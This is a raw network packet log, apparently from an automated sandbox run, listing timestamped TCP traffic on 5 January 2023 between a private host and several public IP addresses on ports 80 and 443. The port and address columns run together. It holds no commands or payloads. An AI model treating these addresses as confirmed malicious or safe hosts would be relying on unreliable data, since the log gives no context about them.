                                                                                                                                                                                    Jan 5, 2023 08:58:30.045744896 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.045753002 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.045790911 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.045798063 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.045838118 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.045844078 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.045886040 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.045892954 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.045933962 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.045941114 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.045981884 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.045986891 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.046034098 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.046035051 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.046082020 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.046096087 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.046128988 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.046140909 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.046175003 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.046186924 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.046221018 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.046236992 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.046268940 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.046283007 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.046314955 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.046323061 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.046360016 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.046407938 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.046426058 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.046426058 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.046453953 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.046483994 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.046499968 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.046524048 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.046546936 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.046586990 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.046598911 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.046628952 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.046648979 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.046679020 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.046717882 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.046717882 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.046773911 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.046780109 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.046818972 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.046837091 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.046861887 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.046875954 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.046906948 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.046916008 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.046953917 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.046963930 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.047000885 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.047008991 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.047049046 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.047055006 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.047096014 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.047101974 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.047142982 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.047149897 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.047189951 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.047194958 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.047236919 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.047243118 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.047322035 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.047329903 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.047368050 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.047378063 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.047415972 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.047424078 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.047463894 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.047468901 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.047509909 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.047518969 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.047555923 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.047568083 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.047604084 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.047605991 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.047652006 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.047661066 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.047698021 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.047704935 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.047744989 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.047750950 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.047791004 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.047799110 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.047841072 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.047846079 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.047885895 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.047893047 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.047931910 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.047939062 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.047977924 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.047985077 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.048023939 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.048032045 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.048070908 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.048080921 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.048116922 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.048125982 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.048163891 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.048172951 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.048216105 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.075547934 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.075642109 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.075690985 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.075737953 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.075777054 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.075783968 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.075778008 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.075778008 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.075830936 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.075853109 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.075853109 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.075879097 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.075925112 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.075972080 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.075978994 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.076019049 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.076026917 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.076046944 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.076065063 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.076112032 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.076122999 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.076158047 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.076172113 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.076205015 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.076239109 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.076251984 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.076261044 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.076297998 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.076332092 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.076344013 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.076392889 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.076407909 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.076442003 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.076476097 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.076520920 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.076549053 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.076567888 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.076594114 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.076613903 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.076658964 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.076662064 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.076683998 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.076705933 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.076750994 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.076787949 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.076797962 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.076807022 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.076844931 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.076885939 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.076890945 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.076909065 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.076937914 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.076982975 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.076984882 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.077004910 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.077029943 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.077055931 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.077076912 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.077095985 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.077122927 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.077138901 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.077169895 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.077182055 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.077217102 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.077224970 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.077263117 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.077280045 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.077305079 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.077323914 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.077388048 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.458587885 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:30.458648920 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:30.476022959 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.476079941 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.551615000 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.551683903 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.551836967 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:30.576771975 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:30.576884985 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:30.594147921 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.594172955 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.664036989 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.664076090 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.664161921 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:30.730994940 CET49743443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:30.731091022 CET4434974368.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.731188059 CET49743443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:30.731489897 CET49743443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:30.731518984 CET4434974368.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:31.099843025 CET4434974368.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:31.100028992 CET49743443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:31.101856947 CET49743443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:31.101881027 CET4434974368.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:31.102185011 CET4434974368.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:31.103199959 CET49743443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:31.103230000 CET4434974368.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:31.425867081 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:31.426182985 CET4974080192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:31.427124023 CET4974480192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:31.486522913 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:31.486726999 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:31.487279892 CET804974462.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:31.487319946 CET804974062.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:31.487406969 CET4974480192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:31.487535000 CET4974080192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:31.514724016 CET4974480192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:31.575371027 CET804974462.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:31.580765963 CET804974462.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:31.583477020 CET4974480192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:31.613625050 CET4434974368.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:31.613688946 CET4434974368.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:31.613729954 CET4434974368.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:31.613949060 CET49743443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:31.613950014 CET49743443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:31.614013910 CET4434974368.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:31.614058018 CET4434974368.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:31.614142895 CET49743443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:31.614190102 CET49743443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:31.650047064 CET4974580192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:31.711747885 CET804974562.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:31.711926937 CET4974580192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:31.748476982 CET4974580192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:31.787667990 CET4434974368.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:31.787725925 CET4434974368.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:31.787848949 CET49743443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:31.787849903 CET49743443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:31.787893057 CET4434974368.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:31.788317919 CET49743443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:31.810137987 CET804974562.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:31.810220003 CET804974562.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:31.810271025 CET804974562.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:31.810349941 CET804974562.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:31.810396910 CET804974562.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:31.810446978 CET804974562.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:31.810484886 CET4974580192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:31.810484886 CET4974580192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:31.810484886 CET4974580192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:31.810492992 CET804974562.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:31.810484886 CET4974580192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:31.810540915 CET804974562.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:31.810547113 CET4974580192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:31.810547113 CET4974580192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:31.810591936 CET804974562.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:31.810599089 CET4974580192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:31.810638905 CET804974562.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:31.810647011 CET4974580192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:31.810695887 CET4974580192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:31.810687065 CET804974562.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:31.810786963 CET4974580192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:31.872277975 CET804974562.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:31.872380972 CET804974562.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:31.872431040 CET804974562.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:31.872478008 CET804974562.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:31.872493029 CET4974580192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:31.872525930 CET804974562.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:31.872556925 CET4974580192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:31.872556925 CET4974580192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:31.872577906 CET804974562.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:31.872585058 CET4974580192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:31.872623920 CET804974562.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:31.872636080 CET4974580192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:31.872672081 CET804974562.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:31.872682095 CET4974580192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:31.872720003 CET804974562.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:31.872725010 CET4974580192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:31.872767925 CET804974562.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:31.872775078 CET4974580192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:31.872814894 CET804974562.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:31.872821093 CET4974580192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:31.872863054 CET804974562.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:31.872867107 CET4974580192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:31.872910976 CET804974562.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:31.872915030 CET4974580192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:31.872957945 CET804974562.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:31.872965097 CET4974580192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:31.873004913 CET804974562.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:31.873012066 CET4974580192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:31.873050928 CET804974562.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:31.873056889 CET4974580192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:31.873097897 CET804974562.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:31.873100996 CET4974580192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:31.873143911 CET804974562.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:31.873148918 CET4974580192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:31.873193026 CET804974562.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:31.873195887 CET4974580192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:31.873239994 CET804974562.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:31.873244047 CET4974580192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:31.873296022 CET4974580192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:31.934921026 CET804974562.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:31.935003996 CET804974562.204.41.145192.168.2.4
